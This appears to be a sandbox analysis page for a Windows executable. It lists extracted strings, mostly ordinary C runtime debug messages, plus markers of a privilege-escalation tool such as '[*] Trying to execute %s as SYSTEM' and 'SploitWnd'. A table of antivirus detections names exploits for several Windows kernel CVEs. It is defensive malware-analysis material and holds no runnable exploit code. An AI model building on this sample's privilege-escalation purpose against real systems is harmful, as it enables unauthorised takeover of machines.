__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_validation_base<char,class __crt_stdio_output::string_output_adapter<char> > >::process
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::format_validation_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> > >::state_case_size
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::format_validation_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> > >::state_case_normal
__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_validation_base<char,class __crt_stdio_output::string_output_adapter<char> > >::state_case_size
__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_validation_base<char,class __crt_stdio_output::string_output_adapter<char> > >::state_case_normal
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::format_validation_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> > >::type_case_n
__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_validation_base<char,class __crt_stdio_output::string_output_adapter<char> > >::type_case_n
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::format_validation_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> > >::type_case_integer
__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_validation_base<char,class __crt_stdio_output::string_output_adapter<char> > >::type_case_integer
__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_validation_base<char,class __crt_stdio_output::string_output_adapter<char> > >::state_case_normal_tchar
string != nullptr
minkernel\crts\ucrt\src\appcrt\stdio\puts.cpp
mscoree.dll
pwcs != nullptr
minkernel\crts\ucrt\src\appcrt\convert\wcstombs.cpp
_wcstombs_l_helper
(dst != nullptr && sizeInBytes > 0) || (dst == nullptr && sizeInBytes == 0)
_wcstombs_s_l
bufferSize <= INT_MAX
sizeInBytes > retsize
minkernel\crts\ucrt\src\desktopcrt\exec\system.cpp
common_system
traits::tdupenv_s_crt(comspec_value.get_address_of(), nullptr, comspec_name)
command[0] != '\0'
pmode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments
minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp
common_configure_argv
minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp
create_environment
traits::tcscpy_s(variable.get(), required_count, source_it)
minkernel\crts\ucrt\src\appcrt\internal\report_runtime_error.cpp
__acrt_report_runtime_error
wcscpy_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), L"Runtime Error!\n\nProgram: ")
Runtime Error!
Program:
wcscpy_s(progname, progname_size, L"<program name unknown>")
<program name unknown>
wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)
wcscat_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), L"\n\n")
wcscat_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), message)
Microsoft Visual C++ Runtime Library
minkernel\crts\ucrt\src\appcrt\lowio\setmode.cpp
(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)
(_osfile(fh) & FOPEN)
("Invalid file descriptor. File possibly closed by a different thread",0)
mode == _O_TEXT || mode == _O_BINARY || mode == _O_WTEXT
_set_fmode
result != nullptr
("Invalid parameter for _configthreadlocale",0)
minkernel\crts\ucrt\src\appcrt\locale\wsetlocale.cpp
_configthreadlocale
mode == 0 || mode == 1
minkernel\crts\ucrt\src\appcrt\heap\new_mode.cpp
_set_new_mode
abort() has been called
_CrtCheckMemory()
minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp
_CrtIsValidHeapPointer(block)
old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks
reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)
__acrt_last_block == old_head
__acrt_first_block == old_head
block != nullptr
is_block_type_valid(header->_block_use)
header->_line_number == line_number_for_ignore_blocks && header->_request_number == request_number_for_ignore_blocks
header->_block_use == block_use || header->_block_use == _CRT_BLOCK && block_use == _NORMAL_BLOCK
__acrt_last_block == header
__acrt_first_block == header
_msize_dbg
new_bits == _CRTDBG_REPORT_FLAG || new_bits_have_only_valid_flags
_CrtSetDbgFlag
state != nullptr
_CrtMemCheckpoint
print_block_data
(*_errno())
((destination)) != NULL && ((size_in_elements)) > 0
minkernel\crts\ucrt\inc\corecrt_internal_string_templates.h
common_tcscpy_s
(((source))) != NULL
Buffer is too small
(L"Buffer is too small" && 0)
Warning
Assertion Failed
For information on how your program can cause an assertion
failure, see the Visual C++ documentation on asserts.
Debug %ls!
Program: %hs%ls%ls%hs%ls%hs%ls%hs%ls%ls%hs%ls
(Press Retry to debug the application)
Debug %ls!
Program: %ls%ls%ls%ls%ls%ls%ls%ls%ls%ls%ls%ls
(Press Retry to debug the application)
minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp
common_message_window
traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))
Expression:
Line:
File:
Module:
wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")
_CrtDbgReport: String too long or IO Error
minkernel\crts\ucrt\inc\corecrt_internal_strtox.h
base == 0 || (2 <= base && base <= 36)
__crt_strtox::parse_integer
c == '\0' || *_p == c
__crt_strtox::c_string_character_source<wchar_t>::unget
_p != nullptr
__crt_strtox::c_string_character_source<wchar_t>::validate
__crt_strtox::c_string_character_source<char>::unget
__crt_strtox::c_string_character_source<char>::validate
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
minkernel\crts\ucrt\src\appcrt\internal\winapi_thunks.cpp
minkernel\crts\ucrt\src\appcrt\stdio\_freebuf.cpp
_loc_update.GetLocaleT()->locinfo->_public._locale_mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->_public._locale_mb_cur_max == 2
minkernel\crts\ucrt\src\appcrt\convert\mbtowc.cpp
UTF-8 isn't supported in this _mbtowc_l function yet!!!
_loc_update.GetLocaleT()->locinfo->_public._locale_lc_codepage != CP_UTF8 && L"UTF-8 isn't supported in this _mbtowc_l function yet!!!"
_loc_update.GetLocaleT()->locinfo->_public._locale_mb_cur_max > 1
destination_count <= INT_MAX
minkernel\crts\ucrt\src\appcrt\convert\wctomb.cpp
_wctomb_s_l
destination_count > 0
minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp
fp_format_nan_or_infinity
strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])
result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)
fp_format_e_internal
strcpy_s( p, result_buffer_count == (static_cast<size_t>(-1)) ? result_buffer_count : result_buffer_count - (p - result_buffer), "e+000")
result_buffer_count > static_cast<size_t>(1 + 4 + precision + 6)
fp_format_a
result_buffer != nullptr
__acrt_fp_format
result_buffer_count > 0
scratch_buffer != nullptr
scratch_buffer_count > 0
("Unsupported format specifier", 0)
stream.valid()
minkernel\crts\ucrt\src\appcrt\stdio\fileno.cpp
_fileno
minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
minkernel\crts\ucrt\src\appcrt\stdio\fwrite.cpp
_fwrite_nolock
buffer != nullptr
element_count <= (SIZE_MAX / element_size)
("Inconsistent Stream Count. Flush between consecutive read and write", stream->_cnt >= 0)
("Flush between consecutive read and write.", !stream.has_any_of(_IOREAD))
minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp
_commit
minkernel\crts\ucrt\src\appcrt\lowio\write.cpp
_write
!_dbcsBufferUsed(fh)
1 < mb_len && mb_buf_used < mb_len
mb_buf_used + bytes_to_add < mb_buf_size
available_bytes <= sizeof(_mbBuffer(fh))
isleadbyte(_dbcsBuffer(fh))
_write_nolock
buffer_size % 2 == 0
cached_state == static_cast<long>(policyValue)
minkernel\crts\ucrt\src\appcrt\internal\win_policies.cpp
name != nullptr
minkernel\crts\ucrt\src\desktopcrt\env\getenv.cpp
traits::tcsnlen(*current + name_length + 1, _MAX_ENV) < _MAX_ENV
buffer_pointer != nullptr
common_dupenv_s_nolock
traits::tcscpy_s(*buffer_pointer, value_count, value)
file_name != nullptr
minkernel\crts\ucrt\src\desktopcrt\exec\spawnv.cpp
common_spawnv
file_name[0] != '\0'
arguments != nullptr
arguments[0] != nullptr
arguments[0][0] != '\0'
traits::tcscpy_s(buffer.get(), file_name_size, dot_slash)
traits::tcscat_s(buffer.get(), file_name_size, file_name)
traits::tcscpy_s(buffer.get(), buffer_size, mutated_file_name)
traits::tcscpy_s(extension_buffer, 5, *it)
execute_command
mode >= 0 && mode <= _P_DETACH
minkernel\crts\ucrt\src\desktopcrt\exec\spawnvp.cpp
common_spawnvp
traits::tdupenv_s_crt(path_value.get_address_of(), nullptr, path_name)
traits::tcscat_s(file_buffer, 260, backslash_string)
traits::tcscat_s(file_buffer, 260, file_name)
path != nullptr
minkernel\crts\ucrt\src\appcrt\filesystem\waccess.cpp
_waccess_s
(access_mode & (~6)) == 0
hminkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp
common_expand_argv_wildcards
traits::tcsncpy_s( character_it, character_count - (character_it - character_first), *it, count)
copy_and_add_argument_to_buffer
traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)
traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)
equal_sign - option < _MAX_ENV
minkernel\crts\ucrt\src\desktopcrt\env\setenv.cpp
traits::tcsnlen(equal_sign + 1, _MAX_ENV) < _MAX_ENV
("CRT logic error in setenv", 0)
common_set_variable_in_environment_nolock
traits::tcscpy_s(name, count, option)
copy_environment
traits::tcscpy_s(*new_it, required_count, *old_it)
local_action != nullptr
minkernel\crts\ucrt\src\appcrt\misc\signal.cpp
("Invalid signal or error", 0)
("Invalid error_mode", 0)
minkernel\crts\ucrt\src\appcrt\misc\set_error_mode.cpp
_set_error_mode
common_tcscat_s
String is not null terminated
(L"String is not null terminated" && 0)
common_tcsncpy_s
static_cast<unsigned>(fh) < _NHANDLE_
minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp
__acrt_lowio_ensure_fh_exists
fh >= 0 && (unsigned)fh < (unsigned)_nhandle
_get_osfhandle
_osfile(fh) & FOPEN
((((( H
((((( H
(
c >= -1 && c <= 255
minkernel\crts\ucrt\src\appcrt\convert\isctype.cpp
("Corrupted pointer passed to _freea", 0)
VCCRT\vcruntime\inc\internal_shared.h
(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[category].locale == nullptr && ptloci->lc_category[category].refcount == nullptr)
minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp
minkernel\crts\ucrt\src\appcrt\heap\expand.cpp
_expand_base
minkernel\crts\ucrt\src\appcrt\misc\dbgrptt.cpp
_VCrtDbgReportA
_itoa_s(nLine, szLineMessage, 4096, 10)
strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")
strcat_s(szLineMessage, 4096, szUserMessage)
strcat_s(szLineMessage, 4096, "\r")
strcat_s(szLineMessage, 4096, "\n")
strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szOutMessage, 4096, szLineMessage)
e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))
wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
_CrtDbgReport: String too long or Invalid characters in String
_VCrtDbgReportW
_itow_s(nLine, szLineMessage, 4096, 10)
Second Chance Assertion Failed: File
<file unknown>
, Line
wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")
Assertion failed:
Assertion failed!
wcscat_s(szLineMessage, 4096, szUserMessage)
wcscat_s(szLineMessage, 4096, L"\r")
wcscat_s(szLineMessage, 4096, L"\n")
%ls(%d) : %ls
wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
wcscpy_s(szOutMessage, 4096, szLineMessage)
wcstombs_s(nullptr, szOutMessage2, 4096, szOutMessage, ((size_t)-1))
strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")
wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp
fclose
_fclose_nolock
minkernel\crts\ucrt\src\appcrt\convert\mbrtowc.cpp
retval != __crt_mbstring::INCOMPLETE
1 <= trail_bytes && trail_bytes <= 3
minkernel\crts\ucrt\src\appcrt\convert\c32rtomb.cpp
c32 < (1u << (7 - trail_bytes))
minkernel\crts\ucrt\src\appcrt\convert\_fptostr.cpp
__acrt_fp_strflt_to_string
buffer_count > 0
buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)
pflt != nullptr
("Division by zero", false)
minkernel\crts\ucrt\inc\corecrt_internal_big_integer.h
minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp
__acrt_fltout
strcpy_s(result, result_count, "0")
strcpy_s(result, result_count, "1#INF" )
strcpy_s(result, result_count, "1#QNAN")
strcpy_s(result, result_count, "1#SNAN")
strcpy_s(result, result_count, "1#IND" )
mantissa_buffer_count > 0
("unexpected input value; log10 failed", 0)
quotient < digits_per_iteration_multiplier
minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp
("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)
minkernel\crts\ucrt\src\appcrt\lowio\isatty.cpp
_isatty
minkernel\crts\ucrt\src\appcrt\lowio\lseek.cpp
common_lseek
("Invalid file descriptor",0)
_string1 != nullptr
minkernel\crts\ucrt\src\appcrt\string\wcsnicol.cpp
_wcsnicoll_l
_string2 != nullptr
count <= INT_MAX
_wcsnicoll
minkernel\crts\ucrt\src\appcrt\string\strnicol.cpp
_strnicoll_l
minkernel\crts\ucrt\src\desktopcrt\exec\cenvarg.cpp
construct_command_line
traits::tcscpy_s(result_it, command_line_count - (result_it - command_line.get()), *source_it)
construct_environment_block
traits::tdupenv_s_crt(system_root_value.get_address_of(), nullptr, system_root_name)
traits::tcscpy_s(result_it, remaining_characters, *it)
traits::tcscpy_s(result_it, system_root_count, system_root_name)
traits::tcscat_s(result_it, system_root_count, equal_sign)
traits::tcscat_s(result_it, system_root_count, system_root_value.get())
base != nullptr || num == 0
minkernel\crts\ucrt\src\appcrt\stdlib\qsort.cpp
width > 0
comp != nullptr
minkernel\crts\ucrt\src\appcrt\convert\xtoa.cpp
common_xtox_s
buffer_count > static_cast<size_t>(is_negative ? 2 : 1)
2 <= radix && radix <= 36
length < buffer_count
common_xtox
lhs != nullptr
rhs != nullptr
s != nullptr
minkernel\crts\ucrt\src\appcrt\convert\mbstowcs.cpp
_mbstowcs_l_helper
(pwcs == nullptr && sizeInWords == 0) || (pwcs != nullptr && sizeInWords > 0)
_mbstowcs_s_l
retsize <= sizeInWords
minkernel\crts\ucrt\src\appcrt\lowio\close.cpp
_close
("Invalid input value", 0)
minkernel\crts\ucrt\src\appcrt\tran\contrlfp.c
_controlfp_s
minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp
CONOUT$
minkernel\crts\ucrt\src\appcrt\string\strnicmp.cpp
_strnicmp_l
_strnicmp
cchCount1==0 && cchCount2==1 || cchCount1==1 && cchCount2==0
minkernel\crts\ucrt\src\appcrt\locale\comparestringa.cpp
(mask&~(_MCW_DN|_MCW_EM|_MCW_RC))==0
minkernel\crts\ucrt\src\appcrt\tran\amd64\ieee.c
user32.dll
normalClass
magicClass
somewnd
[*] Trying to execute %s as SYSTEM
WinSta0\Default
hongye
unamer
SploitWnd
yntdll.dll
#32768
20211732
20201054
20191458
20190808
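Antivirus Signature
(Per-engine detection labels. The engines below name different CVEs (CVE-2018-8120, CVE-2019-0808, CVE-2019-1458, CVE-2021-1732), so the labels alone do not establish which vulnerability the sample targets; "Clean" means only that the engine raised no detection.)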
Bkav Clean
Lionic Hacktool.Win64.CVE-2018-8120.3!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.36891454
CMC Clean
CAT-QuickHeal Trojan.Win64
ALYac Trojan.GenericKD.36891454
Cylance Unsafe
VIPRE Trojan.Win32.Generic!BT
Sangfor Clean
K7AntiVirus Trojan ( 0057c5d11 )
BitDefender Trojan.GenericKD.36891454
K7GW Trojan ( 0057c5d11 )
CrowdStrike Clean
BitDefenderTheta Clean
Cyren W64/Trojan.ABHV-4635
Symantec Trojan.Gen.MBT
ESET-NOD32 a variant of Win64/Exploit.CVE-2019-0808.B
Baidu Clean
APEX Malicious
Paloalto Clean
ClamAV Clean
Kaspersky HEUR:Exploit.Win64.CVE-2018-8120.gen
Alibaba Exploit:Win32/Consoler.333a10cb
NANO-Antivirus Exploit.Win64.CVE20190808.ivmwnk
SUPERAntiSpyware Clean
Rising Exploit.CVE-2019-0808!8.113DD (CLOUD)
Ad-Aware Trojan.GenericKD.36891454
Sophos Troj/Agent-BHAZ
Comodo Clean
F-Secure Clean
DrWeb Exploit.CVE-2019-0808.1
Zillya Exploit.CVE20190808.Win64.6
TrendMicro TROJ_GEN.R002C0DED21
McAfee-GW-Edition Artemis!Trojan
FireEye Trojan.GenericKD.36891454
Emsisoft Trojan.GenericKD.36891454 (B)
SentinelOne Clean
GData Trojan.GenericKD.36891454
Jiangmin Clean
MaxSecure Trojan.Malware.73681419.susgen
Avira EXP/CVE-2018-8120.csjup
MAX malware (ai score=87)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Trojan.Win64.Downloader.sa
Arcabit Trojan.Generic.D232EB3E
ViRobot Clean
ZoneAlarm Clean
Microsoft Exploit:Win32/Consoler.B!dha
Cynet Malicious (score: 100)
AhnLab-V3 Clean
Acronis Clean
McAfee Artemis!5B7DB76369CF
TACHYON Clean
VBA32 Exploit.Win64.CVE-2018-8120
Malwarebytes Clean
Panda Trj/CI.A
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0DED21
Tencent Clean
Yandex Clean
Ikarus Exploit.CVE-2019-0808
eGambit Clean
Fortinet W64/CVE20211732.D!exploit
Webroot Clean
AVG Win32:CVE-2019-1458-G [Expl]
Cybereason Clean
Avast Win32:CVE-2019-1458-G [Expl]
Qihoo-360 Clean
No IRMA results available.